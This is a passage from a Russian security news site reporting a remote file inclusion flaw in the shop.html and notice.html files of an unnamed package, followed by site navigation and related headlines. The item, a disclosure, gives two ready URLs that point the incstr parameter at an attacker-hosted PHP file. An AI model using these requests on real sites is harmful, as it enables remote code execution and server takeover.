Входящие в ее комплект файлы shop.html и notice.html позволяют подключить к себе (и в дальнейшем выполнить) любой файл, указанный в переменной incstr без какой бы то ни было проверки содержимого:
http://[victim]/shop.html?incstr=http://[hacker]/myfile.php
http://[victim]/notice.html?incstr=http://[hacker]/myfile.php
Если на атакующем хосте установлен php, то сценарию, естественно, нужно дать расширение, не приводящее к его исполнению - например myfile.inc.

Источник: NivaX, http://www.web-hack.ru

теги: .net  |  предложить новость  |  обсудить  |  все отзывы (0)

[4309]

назад «  » вперед

аналогичные материалы Взлом 180 тысяч ASP.Net сайтов через sql-инъекции // 21.10.11 00:22 Плагин MS ставил под удар пользователей FireFox // 17.10.09 01:57 Октябрьские обновления от MS // 14.10.09 00:19 Августовские обновления от MS // 11.08.09 22:40 Microsoft представила новый язык программирования // 11.05.09 21:10 Обход защиты памяти в Vista // 12.08.08 02:11 Эти страшные NULL-pointerы // 05.05.08 22:24

последние новостиBugTraq.Ru: последние новости От повторного пришествия Шаи-Хулуда пострадало 25 с лишним тысяч разработчиков // 25.11.25 13:42 Крупный сбой Azure и других сервисов Microsoft // 29.10.25 20:02 Серьезный сбой AWS положил множество сервисов // 20.10.25 12:57 Фишинговая атака на Python-разработчиков // 26.09.25 17:21 ФБР нашла русский след в атаках на древние Cisco // 22.08.25 22:43 Массовый взлом SharePoint // 23.07.25 22:07 Microsoft Authenticator прекращает поддержку паролей // 30.06.25 21:19